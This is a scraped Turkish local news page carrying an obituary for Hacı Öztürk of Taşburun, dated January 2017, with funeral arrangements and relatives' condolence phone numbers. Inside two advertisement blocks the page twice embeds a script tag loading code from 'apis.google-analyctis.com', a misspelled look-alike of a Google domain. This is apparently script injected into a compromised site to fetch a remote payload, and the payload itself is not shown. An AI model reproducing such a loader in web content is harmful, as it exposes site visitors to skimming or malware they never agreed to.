class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Hacı Öztürk 76 yaşında</h1> <h2 class="lead" itemprop="description"><strong>Taşburun (Ketizmen) mahallesinden merhum Cuma ve Beyli Öztürk ailesinin oğlu</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2017-01-21 15:10:13" content="2017-01-21T15:10:13+02:00">21 Ocak 2017 Cumartesi 15:10</span></p> <p class="pull-right">Bu haber <b class="hitCounter"></b> kez okundu.</p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg" alt="Hacı Öztürk 76 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/haci-ozturk-76-yasinda-h37594.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div> <div class="reklam reklam134 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" width="200" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" /></object></div> <div class="reklam reklam135 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/ceren4_1.swf" width="600" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/ceren4_1.swf" /></object></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Taşburun (Ketizmen) mahallesinden merhum Cuma ve Beyli Öztürk ailesinin oğlu, emekli İmam Hafız Mehmet Öztürk ve Emine Aytaç'ın kardeşi,&#160; emekli Öğretmen Mevlüt, Ankara'da sanayici Zekeriya ve Cuma Öztürk, Kadriye Bak, Anişe Öztürk ve Fikriye Baydemir kardeşlerin abisi, sanayi esnaflarından Hasan Öztürk'ün kayınpederi, Saniye Öztürk'ün babası, EÜAŞ personeli Ethem,Ergin, Gazeteci Ali Öztürk, Selçuk Öztürk'ün amcası, Orhan, Alaaddin, Burhan Aytaç ve Mehmet Bak'ın dayısı,&#160; Bahri ve Ahmet Öztürk'ün eniştesi, Mehmet Öztürk, Hasan Bak ve Tahsin Baydemir'in kayınbiraderi, Hacı Öztürk, 21 Ocak 2017 günü vefat etmiştir.<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Cenazesi 22 Ocak 2017 Pazar günü öğle namazına müteakip namazı kılınarak aile mezarlığına defnedilecektir.<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Kur’an-ı Kerimi Taşburun Mahallesi taziye evinde okunacaktır.<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Taziye için telefon:<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">0 543 979 93 23 abisi Mehmet Öztürk,<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">0 532 411 21 77 kardeşi Zekeriya,<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">0 546 241 14 10 damadı Hasan.<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">&#160;</span></p></div> </div> </article> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(37594);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="37594" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="7972fdd40902628131a34ca89b6f410629452b2c" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/fethiye-cuce-30-yasinda-h37596.html" title="Fethiye Cüce 30 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/fethiye_cuce_30_yasinda_h37596_ea724.jpg" alt="Fethiye Cüce 30 yaşında" /> <span>Fethiye Cüce 30 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/halide-ilhan-58-yasinda-h37595.html" title="Halide İlhan 58 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/halide_ilhan_58_yasinda_h37595_e4f32.jpg" alt="Halide İlhan 58 yaşında" /> <span>Halide İlhan 58 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/servet-baylar-94-yasinda-h37590.html" title="Servet Baylar 94 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/servet_baylar_94_yasinda_h37590_c3d97.jpg" alt="Servet Baylar 94 yaşında" /> <span>Servet Baylar 94 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ekber-gultekin-anma-h37588.html" title="Ali Ekber Gültekin Anma"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/ali_ekber_gultekin_anma_h37588_508a1.jpg" alt="Ali Ekber Gültekin Anma" /> <span>Ali Ekber Gültekin Anma</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/fadime-cakir-88-yasinda-h37584.html" title="Fadime Çakır 88 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/fadime_cakir_88_yasinda_h37584_61cbc.jpg" alt="Fadime Çakır 88 yaşında" /> <span>Fadime Çakır 88 yaşında</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/missdefne-gelinlik-icin-tecrubeli-eleman-araniyor-3839.html" title="MissDefne Gelinlik İçin Tecrübeli Eleman Aranıyor" >MissDefne Gelinlik İçin Tecrübeli Eleman Aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/missdefne-gelinlik-icin-tecrubeli-eleman-araniyor-3839.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/71cdb7fd5a8bbace3b50ac1d7e1724ea3011b7cb.jpg" alt="MissDefne Gelinlik İçin Tecrübeli Eleman Aranıyor" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-3827.html" title="SATILIK TARLA" >SATILIK TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-3827.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/1e5e19c4d38fc39166f0d2ab78bb75e031ca34ed.jpg" alt="SATILIK TARLA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrike-bayan-elaman-alinacak-3781.html" title="Cihangir elektrike bayan elaman alınacak" >Cihangir elektrike bayan elaman alınacak</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrike-bayan-elaman-alinacak-3781.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/9fc4c24044365ac79f56cd1f33dacaf4e0b9a59a.jpg" alt="Cihangir elektrike bayan elaman alınacak" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/pizza-ustasi-3766.html" title="pizza ustası" >pizza ustası</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/pizza-ustasi-3766.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="pizza ustası" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-sobali-daire-31-160-m2-3761.html" title="SATILIK SOBALI DAİRE 3+1 160 m2" >SATILIK SOBALI DAİRE 3+1 160 m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-sobali-daire-31-160-m2-3761.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK SOBALI DAİRE 3+1 160 m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-200-metre-kare-daire-3759.html" title="SATLIK 200 METRE KARE DAİRE" >SATLIK 200 METRE KARE DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-200-metre-kare-daire-3759.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATLIK 200 METRE KARE DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mahsatilik-parselli-449m2-arsa-3757.html" title="BATTALGAZİ MAH.SATILIK PARSELLİ 449M2 ARSA" >BATTALGAZİ MAH.SATILIK PARSELLİ 449M2 ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mahsatilik-parselli-449m2-arsa-3757.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="BATTALGAZİ MAH.SATILIK PARSELLİ 449M2 ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyuirt-mahsatilik-parselli-549-m2-arsa-3756.html" title="YEŞİLYUIRT MAH.SATILIK PARSELLİ 549 M2 ARSA" >YEŞİLYUIRT MAH.SATILIK PARSELLİ 549 M2 ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyuirt-mahsatilik-parselli-549-m2-arsa-3756.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="YEŞİLYUIRT MAH.SATILIK PARSELLİ 549 M2 ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sekreter-araniyor-3752.html" title="Sekreter aranıyor" >Sekreter aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sekreter-araniyor-3752.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Sekreter aranıyor" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/30122016-3717.html" title="30.12.2016" >30.12.2016</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/30122016-3717.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="30.12.2016" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/golvadisi-2-residence-51-super-lux-3700.html" title="GÖLVADİSİ 2 RESİDENCE (5+1) SÜPER LÜX" >GÖLVADİSİ 2 RESİDENCE (5+1) SÜPER LÜX</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/golvadisi-2-residence-51-super-lux-3700.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/879842b13951219cf7f1228127247c7cb8eaeae3.jpg" alt="GÖLVADİSİ 2 RESİDENCE (5+1) SÜPER LÜX" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/toki-den-sahibinden-satilik-c6-kat-5-3663.html" title="TOKİ&#039;den sahibinden satılık c6 kat 5" >TOKİ&#039;den sahibinden satılık c6 kat 5</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/toki-den-sahibinden-satilik-c6-kat-5-3663.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TOKİ&#039;den sahibinden satılık c6 kat 5" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-3661.html" title="Kiralık daire" >Kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-3661.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/daire-3657.html" title="DAİRE" >DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/daire-3657.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/emniyet-civari-21-kaloferli-3656.html" title="EMNİYET CİVARI 2+1 KALOFERLİ" >EMNİYET CİVARI 2+1 KALOFERLİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/emniyet-civari-21-kaloferli-3656.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="EMNİYET CİVARI 2+1 KALOFERLİ" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes">16.4B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/#" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/#" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:57</td> <td>07:35</td> <td>12:54</td> <td>15:35</td> <td>17:55</td> <td>19:21</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37307.html" title="Elbistana şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistana_sehit_atesi_dustu_h37307_04759.jpg" alt="Elbistana şehit ateşi düştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37307.html" title="" ><span class="en-hit">1.</span> <strong>Elbistan’a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Fırat Kalkanı Harekatı kapsamında Suriye’nin El-Bab kentinde Elbistanlı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-guzel-vatan-topragina-emanet-edildi-h37315.html" title="Şehit Uzman Onbaşı Güzel, vatan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sehit_uzman_onbasi_guzel_vatan_topragina_emanet_edildi_h37315_92807.JPG" alt="Şehit Uzman Onbaşı Güzel, vatan..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-guzel-vatan-topragina-emanet-edildi-h37315.html" title="" ><span class="en-hit">2.</span> <strong>Şehit Uzman Onbaşı Güzel, vatan...</strong> <span class="en-spot en-hidden">Fırat Kalkanı Harekatı&#039;nın 128. gününde DEAŞ saldırısı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-okullar-tatil-edildi-h37261.html" title="Elbistanda okullar tatil edildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistanda_okullar_tatil_edildi_h37261_fed5b.jpg" alt="Elbistanda okullar tatil edildi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-okullar-tatil-edildi-h37261.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan’da okullar tatil edildi</strong> <span class="en-spot en-hidden">Elbistan’da okullar tatil edildi</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-okullar-tedbir-icin-tatil-edildi-h37416.html" title="Elbistanda okullar tedbir için..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistanda_okullar_tedbir_icin_yarin_tatil_edildi_h37416_b3014.Jpeg" alt="Elbistanda okullar tedbir için..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-okullar-tedbir-icin-tatil-edildi-h37416.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan’da okullar tedbir için...</strong> <span class="en-spot en-hidden">Elbistan’da beklenen etkili kar yağışı ve tipi nedeniyle tedbir...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/talihsiz-genc-1-aydir-verdigi-yasam-savasini-kaybetti-h37495.html" title="Talihsiz genç, 1 aydır verdiği yaşam..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/talihsiz_genc_1_aydir_verdigi_yasam_savasini_kaybetti_h37495_46bb7.jpg" alt="Talihsiz genç, 1 aydır verdiği yaşam..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/talihsiz-genc-1-aydir-verdigi-yasam-savasini-kaybetti-h37495.html" title="" ><span class="en-hit">5.</span> <strong>Talihsiz genç, 1 aydır verdiği yaşam...</strong> <span class="en-spot en-hidden">Elbistan sanayi sitesindeki bir işyerinde soba yakmak için kullanılan...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div 